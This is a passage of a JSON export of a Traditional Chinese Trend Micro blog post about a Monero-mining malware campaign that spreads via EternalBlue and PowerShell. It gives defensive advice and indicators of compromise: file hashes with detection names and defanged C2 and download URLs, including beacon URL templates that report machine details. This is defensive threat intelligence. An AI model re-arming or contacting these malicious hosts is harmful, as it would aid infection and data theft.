href=\"https:\/\/www.trendmicro.com.tw\/edm\/Tracking.asp?id=2651&amp;name=20110916\">\u8da8\u52e2\u79d1\u6280<\/a>\u5efa\u8b70\u8981\u5118\u65e9\u4f7f\u7528\u5ee0\u5546\u63d0\u4f9b\u7684\u4fee\u88dc\u7a0b\u5f0f\u4f86\u66f4\u65b0\u7cfb\u7d71\u3002\u4f7f\u7528\u8001\u820a\u8edf\u9ad4\u7684\u7528\u6236\u4e5f\u53ef\u4ee5\u900f\u904e\u53ef\u9760\u7684\u865b\u64ec\u4fee\u88dc\u6280\u8853\u4f86\u4fdd\u8b77\u81ea\u5df1\u3002\u76f4\u5230\u672c\u6587\u64b0\u5beb\u6642\uff0c\u60e1\u610f\u8edf\u9ad4\u4ecd\u5728\u6d3b\u52d5\u4e2d\u4e14\u5df2\u7d93\u66f4\u65b0\uff0c\u4e26\u4e14\u6703\u9023\u5230\u65b0\u7db2\u5740\u3002\u4f7f\u7528\u8907\u96dc\u5bc6\u78bc\uff0c\u4e26\u4e14\u5118\u53ef\u80fd\u5730<a href=\"https:\/\/blog.trendmicro.com\/two-factor-authentication-what-is-it-and-why-do-i-need-it-to-stay-safe-online\/\">\u5206\u5c64\u8a8d\u8b49<\/a>\u6388\u6b0a\u3002\u540c\u6642\u5efa\u8b70\u4f01\u696d\u8981\u61c9\u7528\u53ef\u4ee5\u5f9e\u9598\u9053\u5230\u7aef\u9ede\u4e3b\u52d5\u5c01\u9396\u9019\u4e9b\u5a01\u8105\u548c\u60e1\u610f\u7db2\u5740\u7684\u591a\u5c64\u6b21\u4fdd\u8b77\u7cfb\u7d71\u3002<\/p>\n\n\n\n<p><strong><em>\u5165\u4fb5\u6307\u6a19<\/em><\/strong><\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  <strong>SHA256<\/strong>\n  <\/td><td>\n  <strong>\u5075\u6e2c\u540d\u7a31<\/strong>\n  <\/td><\/tr><tr><td>\n  3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Trojan.PS1.MIMIKATZ.ADW\">Trojan.PS1.MIMIKATZ.ADW<\/a>\n  <\/td><\/tr><tr><td>\n  7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Trojan.PS1.LUDICROUZ.A\">Trojan.PS1.LUDICROUZ.A<\/a>\n  <\/td><\/tr><tr><td>\n  aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/TrojanSpy.Win32.BEAHNY.THCACAI\">TrojanSpy.Win32.BEAHNY.THCACAI<\/a>\n  <\/td><\/tr><tr><td>\n  e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Trojan.PS1.PCASTLE.B\">Trojan.PS1.PCASTLE.B<\/a>\n  <\/td><\/tr><tr><td>\n  fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/HackTool.Win32.Impacket.AI\">HackTool.Win32.Impacket.AI<\/a>\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><strong>\u7db2\u5740<\/strong><\/p>\n\n\n\n<ul><li>hxxp:\/\/down[.]beahh[.]com\/c32.dat<\/li><li>hxxp:\/\/down[.]beahh[.]com\/new.dat?allv5<\/li><li>hxxp:\/\/ii[.]ackng[.]com\/t.php?ID={Computer\nName}&amp;GUID={GUID}&amp;MAC={MAC ADDRESS}&amp;OS={OS Version&amp;BIT={32\/64}&amp;CARD={VIDEO\nCARD INFORMATION}&amp;_T={TIME}<\/li><li>hxxp:\/\/log[.]beahh[.]com\/logging.php?ver=5p?src=wm&amp;target<\/li><li>hxxp:\/\/oo[.]beahh[.]com\/t.php?ID={Computer\nName}&amp;GUID={GUID}&amp;MAC={MAC ADDRESS}&amp;OS={OS\nVersion&amp;BIT={32\/64}&amp;CARD={VIDEO CARD INFORMATION}&amp;_T={TIME}<\/li><li>hxxp:\/\/p[.]beahh[.]com\/upgrade.php<\/li><li>hxxp:\/\/pp[.]abbny[.]com\/t.php?ID={Computer\nName}&amp;GUID={GUID}&amp;MAC={MAC ADDRESS}&amp;OS={OS\nVersion&amp;BIT={32\/64}&amp;CARD={VIDEO CARD INFORMATION}&amp;_T={TIME}<\/li><li>hxxp:\/\/v[.]beahh[.]com\/wm?hp<\/li><li>hxxp:\/\/v[.]y6h[.]net\/g?h<\/li><li>hxxp:\/\/v[.]y6h[.]net\/g?l<\/li><li>lplp1[.]abbny[.]com:443<\/li><li>lplp1[.]ackng[.]com:443<\/li><li>lplp1[.]beahh[.]com:443<\/li><\/ul>\n\n\n\n<p>@\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/miner-malware-spreads-beyond-china-uses-multiple-propagation-methods-including-eternalblue-powershell-abuse\/\">Miner\nMalware Spreads Beyond China, Uses Multiple Propagation Methods Including\nEternalBlue, Powershell Abuse<\/a> \u4f5c\u8005\uff1aAugusto Remillano\nII\u548cArvin Macaraeg\uff08<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/author\/trend-micro\/\">\u8da8\u52e2\u79d1\u6280<\/a>\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u5230\u4e00\u500b\u60e1\u610f\u8edf\u9ad4: Trojan.PS1.LUDICROUZ.A\u7528\u591a\u7a2e\u611f\u67d3\u65b9\u5f0f,\u64f4\u6563\u9580\u7f85\u5e63\u6316\u7926\u7a0b\u5f0f\u5230 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[1268,11,3647,156],"tags":[3231,1483,2344,4195,3335,3140],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/60232"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=60232"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/60232\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=60232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=60232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=60232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}